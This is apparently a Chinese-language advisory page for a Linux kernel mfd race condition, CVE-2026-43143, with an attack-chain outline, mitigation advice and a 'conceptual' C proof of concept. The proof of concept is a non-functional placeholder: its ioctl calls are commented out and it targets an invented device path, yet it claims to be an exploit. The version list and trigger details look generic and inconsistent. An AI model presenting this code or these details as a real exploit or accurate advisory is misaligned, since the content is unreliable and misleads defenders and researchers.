CVE-2026-43143 CVSS 5.5 中危

CVE-2026-43143 Linux内核mfd核心组件竞争条件漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43143

漏洞类型

竞争条件

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的mfd: core组件中存在一个安全漏洞，由于在访问或修改'mfd_of_node_list'链表时缺乏必要的互斥锁保护，导致本地攻击者可利用竞争条件破坏内核数据结构。这可能引发内核崩溃或系统拒绝服务，影响系统可用性。

技术细节

该漏洞位于Linux内核的drivers/mfd/core.c驱动核心代码中。MFD子系统负责管理多功能设备及其子设备，维护了一个名为mfd_of_node_list的全局链表来记录设备节点信息。在受影响的版本中，代码在执行链表的遍历、添加或删除操作时未使用mutex进行同步。当本地低权限用户通过特定的系统调用（如ioctl或sysfs操作）并发触发MFD设备的注册与注销流程时，会导致竞态条件。这种并发访问可能导致链表指针损坏，进而引发内核空指针解引用或死锁，最终导致系统崩溃。修复方式是在所有访问该链表的代码路径中加入mutex_lock/unlock机制。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者需要在目标系统上拥有本地低权限账户（PR:L）。

STEP 2

2. 触发并发操作

攻击者运行恶意程序，该程序创建多个线程，并发地执行能够触发MFD设备添加和移除的系统调用。

STEP 3

3. 利用竞争条件

由于内核缺乏锁保护，多线程对mfd_of_node_list的并发访问导致链表结构损坏。

STEP 4

4. 导致系统崩溃

内核访问损坏的链表指针，触发空指针异常或内核恐慌，导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43143 (Conceptual)
 * This code attempts to trigger the race condition in mfd_of_node_list
 * by concurrently adding and removing MFD devices.
 * Requires access to a vulnerable MFD device interface.
 */

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

#define DEVICE_PATH "/dev/vulnerable_mfd_device"

void *thread_add(void *arg) {
    int fd = open(DEVICE_PATH, O_RDWR);
    if (fd < 0) return NULL;
    
    // Simulate triggering device add operation
    // ioctl(fd, MFD_ADD_DEVICE, NULL);
    
    close(fd);
    return NULL;
}

void *thread_remove(void *arg) {
    int fd = open(DEVICE_PATH, O_RDWR);
    if (fd < 0) return NULL;
    
    // Simulate triggering device remove operation
    // ioctl(fd, MFD_REMOVE_DEVICE, NULL);
    
    close(fd);
    return NULL;
}

int main() {
    pthread_t t1, t2;
    
    printf("[+] Starting Race Condition PoC for CVE-2026-43143\n");
    
    for (int i = 0; i < 1000; i++) {
        pthread_create(&t1, NULL, thread_add, NULL);
        pthread_create(&t2, NULL, thread_remove, NULL);
        
        pthread_join(t1, NULL);
        pthread_join(t2, NULL);
    }
    
    printf("[+] Exploit finished. Check for kernel panic.\n");
    return 0;
}

影响范围

Linux Kernel < 6.1 (Specific commit fixes apply)

Linux Kernel < 5.15 (Specific commit fixes apply)

Linux Kernel < 5.10 (Specific commit fixes apply)

防御指南

临时缓解措施

建议立即更新操作系统内核到最新稳定版本，以修复该竞争条件漏洞。如果无法立即更新，应严格限制本地用户的权限，减少潜在的攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表